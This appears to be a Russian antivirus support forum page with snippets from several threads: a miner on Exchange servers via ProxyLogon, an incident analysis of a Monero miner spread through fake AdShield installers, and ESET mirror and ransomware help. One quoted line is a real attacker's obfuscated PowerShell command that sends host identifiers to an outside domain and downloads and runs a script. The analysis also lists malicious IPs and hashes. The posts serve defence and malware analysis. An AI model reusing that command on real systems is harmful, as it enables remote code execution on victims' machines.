Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Выбрать дату в календареВыбрать дату в календаре

[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
[QUOTE]Владимир Шариков написал:
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?[/QUOTE]
шифрованный код. понятно, что расшифровывается на вашей системе, или наоборот в зашифрованном виде уходит в сеть

сервера похоже, китайские


это зависит от  того, как долго данные задачи работали на серверах. возможно установили бэкдоры, возможно сливали почтуЮ возможно, пытались получить данные из Active Directory, возможно готовились к шифрованию доступных узлов из сети.

стоит конечно тщательно отсканировать клиентские системы и другие сервера, в том числе контроллеры домена.
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
[B]сервер можно будет перегрузить (скриптом)?[/B]
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
сервер удаленного управления сами ставили?
C:\PROGRAM FILES (X86)\LITEMANAGER PRO - SERVER\ROMSERVER.EXE

есть задачи, через которые возможно пытаются перехватить пароли.
[QUOTE]C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
-W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))[/QUOTE]

update: возможно, здесь выполняется скачивание зашифрованного скрипта с адреса DOWN.SQLNETCAT.COM, (причем судя по префиксу 20210317 он может обновляться), а далее, powershell.exe его расшифровывает, и выполняет.
После восстановления системы ошибка с антивирусом, Антивирус и восстановление системы
Цитата
Danil Perepelyak написал:
И после обновления антивируса папка 23862 на этом расположении была.

попробуйте запустить восстановление системы из безопасного режима системы,
Майнер Monero распространяется через установку пакетов AdShield/Netshield, OpenDNS
Активность майнера наблюдалась на форумах безопасности (Kasperskyclub.ru, Virusinfo.info, Cyberforum.ru) в период с февраля 2021, хотя отзывы о проблеме судя по поискам в сети пошли ранее (ноябрь-декабрь 2020г)
По отчету [URL=https://securelist.ru/ad-blocker-with-miner-included/100732/]Лаборатории Касперского на securelist.ru[/URL], активное детектирование зловредов началось с февраля 2021 года.

1.

[QUOTE] Зловред распространяется под именем adshield[.]pro и выдает себя за Windows-версию мобильного блокировщика рекламы AdShield. После того как пользователь запускает программу, она меняет настройки DNS на устройстве так, что все домены начинают разрешаться через серверы злоумышленников, которые, в свою очередь, не дают пользователям получить доступ к сайтам некоторых антивирусов, например к Malwarebytes.com.[/QUOTE]

185.201.47.42,142.4.214.15\DNS Server list

2.

[QUOTE] После подмены DNS-серверов зловред начинает обновляться и запускает updater.exe с аргументом self-upgrade («C:\Program Files (x86)\AdShield\updater.exe» -self-upgrade). Updater.exe обращается к командному центру и отправляет сведения о зараженной машине и информацию о начале установки.[/QUOTE]

C:\PROGRAM FILES (X86)\ADSHIELD\UPDATER.EXE
HEUR:Trojan.Win32.DNSChanger.gen
C:\WINDOWS\SYSTEM32\TASKS\ADSHIELD SCHEDULED AUTOUPDATE
"C:\Program Files (x86)\AdShield\updater.exe" -self-upgrade

3.

[QUOTE] Updater.exe скачивает с сайта transmissionbt[.]org и запускает модифицированный торрент-клиент Transmission (оригинальный дистрибутив находится по адресу transmissionbt.com). Модифицированная программа отсылает на командный сервер информацию об установке вместе с идентификатором зараженной машины и загружает с него модуль для майнинга.[/QUOTE]

Модули для майнинга состоят из легитимных вспомогательных библиотек, зашифрованного файла с майнером data.pak, исполняемого файла flock.exe\slack.exe\discord.exe и файла «лицензии» lic.data.

[QUOTE] ....
   \Flock\config.json
   \Flock\data.pak
   \Flock\Flock.exe
   \Flock\lic.data
   \Flock\Qt5Core.dll
   \Flock\WinRing0x64.sys
   ...[/QUOTE]

4. flock.exe запускается с помощью клиента transmission (запускаемый как служба)
C:\PROGRAM FILES (X86)\TRANSMISSION\TRANSMISSION-DAEMON.EXE
Действительна, подписано SignPath Foundation
"C:\Program Files (x86)\Transmission\transmission-daemon.exe" -run-instance

5. после запуска Flock.exe расшифровывает данные из файла data.pak, содержащие файл майнера.
далее, в копию системного файла find.exe внедряется расшифрованное тело майнера.

(!) Процесс нагружает CPU: C:\WINDOWS\SYSTEM32\FIND.EXE
(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3648], tid=3940

[QUOTE]Полное имя C:\WINDOWS\SYSTEM32\FIND.EXE

Удовлетворяет критериям
THREADS IN PROCESSES (ПРЕДУПРЕЖДЕНИЕ ~ ОБНАРУЖЕН ВНЕДРЕННЫЙ ПОТОК В ПРОЦЕССЕ)(1) [auto (0)]
FLOCK (FILTERED) (ПОЛНОЕ ИМЯ ~ \WINDOWS\SYSTEM32\FIND.EXE)(1) [filtered (0)]
FLOCK (FILTERED).NET ( ESTABLISHED ~ > 54.93.84.207:443)(1) [filtered (0)]

pid = 3076 ***\***
CmdLine "C:\ProgramData\Flock\find.exe"
Процесс создан 00:39:49 [2021.02.18]
С момента создания 00:05:25
CPU 49,85%
CPU (1 core) 797,57%
parentid = 13628
ESTABLISHED 192.168.0.98:55478 <-> 54.93.84.207:443
Предупреждение (!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3076], tid=14380
Предупреждение (!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3076], tid=9436
SHA1 1E44EE63BDB2CF3A6E48B521844204218A001344
MD5 AE3F3DC3ED900F2A582BAD86A764508C

Загруженные DLL НЕИЗВЕСТНЫЕ
BXSDK64.DLL C:\USERS\SHUM\APPDATA\LOCAL\TEMP

Загруженные DLL ИЗВЕСТНЫЕ и ПРОВЕРЕННЫЕ
ADVAPI32.DLL C:\WINDOWS\SYSTEM32[/QUOTE]



далее, разработчиком uVS предложена новая функция (реализована в 4.11.5 и расширена в 4.11.6), которая позволила отследить, каким образом запускается Flock.exe\Slack.exe\Discord.exe
+
спасибо[B], Sandor-у [/B]за оперативно [URL=https://www.cyberforum.ru/post15308023.html]добавленный диалог[/URL]:
+
[B]Vvvyg[/B] - за скрипт экспорта журналов для анализа,
+
[B]Virus Monitoring Service Doctor Web Ltd[/B]. за поиск тела майнера в папке модулей flock

благодаря предложенной функции стало возможным отследить цепочку запуска вредоносных программ.

[QUOTE]EV_RenderedValue_0,00
Elvi51
ELVI51
277248
7264
C:\Windows\System32\find.exe
%%1937
16620
"C:\WINDOWS\system32\find.exe"
EV_RenderedValue_9,00
-
-
0
C:\ProgramData\Discord\Discord.exe
EV_RenderedValue_14,00
[/QUOTE]

К событию были добавлены следующие сведения:

[QUOTE]EV_RenderedValue_0,00
ELVI51$
WORKGROUP
999
16620
C:\ProgramData\Discord\Discord.exe
%%1937
1400
C:\ProgramData\Discord\Discord.exe --min
EV_RenderedValue_9,00
Elvi51
ELVI51
277248
C:\Windows\System32\svchost.exe
EV_RenderedValue_14,00[/QUOTE]

по образу из uVS видим что Discord.exe запускается через задачу:

[QUOTE]Полное имя C:\PROGRAMDATA\DISCORD\DISCORD.EXE
Сигнатура Trojan.Win64.Miner.gen [Kaspersky] (delall) [глубина совпадения 33(58), необх. минимум 30, максимум 64] 2021-02-28

SHA1 397F3E0FD803DA50EC667C1161E57CDC242400C3
MD5 07D8343249A56EEBF2B1A8B944C217A3

Ссылки на объект
Ссылка C:\WINDOWS\TASKS\DISCORDCHECK_4.JOB
Значение "C:\ProgramData\Discord\Discord.exe" --min[/QUOTE]

[QUOTE]4.11.5 o Добавлена поддержка отслеживания процессов.
Отслеживание процессов позволяет определять родителя любого процесса, даже если родительский процесс уже завершен, а также достоверно определять все файлы, которые запускались с момента старта системы.[/QUOTE]

Полное имя C:\PROGRAMDATA\SLACK\SLACK.EXE
Тек. статус ВИРУС [Запускался неявно или вручную]

Создан 08.03.2021 в 09:52:29
Изменен 08.03.2021 в 11:17:11

Доп. информация на момент обновления списка
pid = 13816 *****\****
Процесс создан 11:17:35 [2021.03.08]
Процесс завершен 11:18:28 [2021.03.08]
parentid = 1684 C:\WINDOWS\SYSTEM32\SVCHOST.EXE
SHA1 9C44709D620DF76174B6E268DADA1256FA3BA007
MD5 C7988D4AE969D11D9ABBAFC8CE0C5CA2

pid = 1684 NT AUTHORITY\СИСТЕМА
CmdLine C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule
Процесс создан 11:16:52 [2021.03.08]

+
[QUOTE]4.11.6 o Добавлена поддержка отслеживания задач.
В окно информации исполняемого файла, который создавал, модифицировал или изменял задачи добавлены следующие разделы:
"Создание задачи", "Удаление задачи", "Обновление задачи" в которых указано время операции, pid процесса,
pid и имя запустившего процесс, а так же XML описание задачи при его наличии.
Твики #39/#40 теперь включают/отключают отслеживание процессов и задач.
(!) Только для Windows 10 билд 1903 и выше.[/QUOTE]
проблемы с зеркалом eset endpoint security 8
Цитата
anton dushko написал:
сейчас сделал для теста зеркало в папке где доступ всем и рабочая группа - ошибка так же вылазит
какое количество компьютеров в рабочей группе? попробуйте создать и проверить зеркало для передачи клиентам по http
проблемы с зеркалом eset endpoint security 8
Цитата
anton dushko написал:
Цитата
 Дмитрий Б  написал:
В настройках зеркала укажите папку куда он будет сохранять обновление. Ошибка может быть потому что место заканчивается.
ошибка возникает даже при переносе папки на диск где свободно гиг 200. Как я заметил она возникает в тот момент, когда с него начинают обновляться другие ПК.

пользователи других ПК имеют права доступа к папке с зеркалом? у вас домен или рабочая группа?
проблемы с зеркалом eset endpoint security 8
Цитата
anton dushko написал:
Цитата
 santy  написал:
ESET Protect используете для управления антивирусными клиентами?
нет. Только endpoint security стоит.
зеркало каким образом создаете? на одном из клиентов?
проблемы с зеркалом eset endpoint security 8
ESET Protect используете для управления антивирусными клиентами?
Cryakl/CryLock - этапы "большого пути"
хорошо, ждем образ автозапуска,

расшифровку ждать придется возможно долго.
иногда дешифровка появляется в теч нескольких лет,
(когда злоумышленники сливают приватные ключи от старых версий.)